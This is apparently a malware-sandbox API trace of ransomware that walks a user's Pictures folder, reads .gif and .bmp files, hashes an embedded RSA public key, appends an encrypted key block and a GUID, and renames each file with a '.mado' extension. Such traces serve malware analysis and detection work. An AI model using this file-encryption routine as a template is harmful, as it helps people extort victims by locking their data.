[0205.963] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.963] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.964] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\") returned="941Y-ufnAszYHOsd\\" [0205.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b671e0 [0205.964] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0205.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0205.964] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0205.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66bb8 [0205.964] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.964] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.964] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.964] PathFindFileNameW (pszPath="") returned="" [0205.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0205.964] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb78994b0, ftCreationTime.dwHighDateTime=0x1d5e0e4, ftLastAccessTime.dwLowDateTime=0x1c1b3070, ftLastAccessTime.dwHighDateTime=0x1d5e07f, ftLastWriteTime.dwLowDateTime=0x1c1b3070, ftLastWriteTime.dwHighDateTime=0x1d5e07f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.966] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb78994b0, ftCreationTime.dwHighDateTime=0x1d5e0e4, ftLastAccessTime.dwLowDateTime=0x1c1b3070, ftLastAccessTime.dwHighDateTime=0x1d5e07f, ftLastWriteTime.dwLowDateTime=0x1c1b3070, ftLastWriteTime.dwHighDateTime=0x1d5e07f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.966] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x418dbd80, ftCreationTime.dwHighDateTime=0x1d5df55, ftLastAccessTime.dwLowDateTime=0x7b9a7880, ftLastAccessTime.dwHighDateTime=0x1d5e089, ftLastWriteTime.dwLowDateTime=0x7b9a7880, ftLastWriteTime.dwHighDateTime=0x1d5e089, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hJg26t0YFz", cAlternateFileName="HJG26T~1")) returned 1 [0205.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77a20 [0205.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77b90 [0205.966] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e6f1e40, ftCreationTime.dwHighDateTime=0x1d5e57d, ftLastAccessTime.dwLowDateTime=0xcc1a4b40, ftLastAccessTime.dwHighDateTime=0x1d5e6fc, ftLastWriteTime.dwLowDateTime=0xcc1a4b40, ftLastWriteTime.dwHighDateTime=0x1d5e6fc, nFileSizeHigh=0x0, nFileSizeLow=0x7b40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="if0-hGC11u2PULYSba.gif", cAlternateFileName="IF0-HG~1.GIF")) returned 1 [0205.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0205.967] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\if0-hGC11u2PULYSba.gif") returned=".gif" [0205.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\if0-hGC11u2PULYSba.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\if0-hgc11u2pulysba.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.967] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=31552) returned 1 [0205.967] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.969] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7b1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.969] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.971] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x7b40, lpOverlapped=0x0) returned 1 [0205.972] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.972] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.972] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.972] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.973] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.973] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.973] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.973] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.973] GetLastError () returned 0x0 [0205.973] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.973] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.973] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.973] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.973] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7b40) returned 0x3b81690 [0205.973] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66bb8 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66c00 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b7a968 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b7a980 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b7a998 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b7a9b0 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.974] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0205.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7a980 | out: hHeap=0x2c0000) returned 1 [0205.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7a9b0 | out: hHeap=0x2c0000) returned 1 [0205.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7a998 | out: hHeap=0x2c0000) returned 1 [0205.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b7a998 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b7a9b0 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b7a980 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72b80 [0205.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.975] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7b40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.975] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.977] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.977] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.977] CloseHandle (hObject=0x63c) returned 1 [0205.978] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\if0-hGC11u2PULYSba.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\if0-hgc11u2pulysba.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\if0-hGC11u2PULYSba.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\if0-hgc11u2pulysba.gif.mado")) returned 1 [0205.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0205.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.979] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0205.980] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2441a750, ftCreationTime.dwHighDateTime=0x1d5e504, ftLastAccessTime.dwLowDateTime=0x5e73fea0, ftLastAccessTime.dwHighDateTime=0x1d5e149, ftLastWriteTime.dwLowDateTime=0x5e73fea0, ftLastWriteTime.dwHighDateTime=0x1d5e149, nFileSizeHigh=0x0, nFileSizeLow=0x18550, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r_peyunY.bmp", cAlternateFileName="")) returned 1 [0205.980] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\r_peyunY.bmp") returned=".bmp" [0205.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\r_peyunY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\r_peyuny.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.981] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=99664) returned 1 [0205.981] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.983] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1852a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.983] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.985] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x18550, lpOverlapped=0x0) returned 1 [0205.986] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.986] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.986] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.986] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.987] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.987] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.987] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.987] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.987] GetLastError () returned 0x0 [0205.987] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.987] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.987] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.987] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.987] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.988] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799b0 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b799c8 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79998 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72b80 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72c98 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.989] GetCurrentThreadId () returned 0x600 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff088 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.989] RtlAllocateHeap 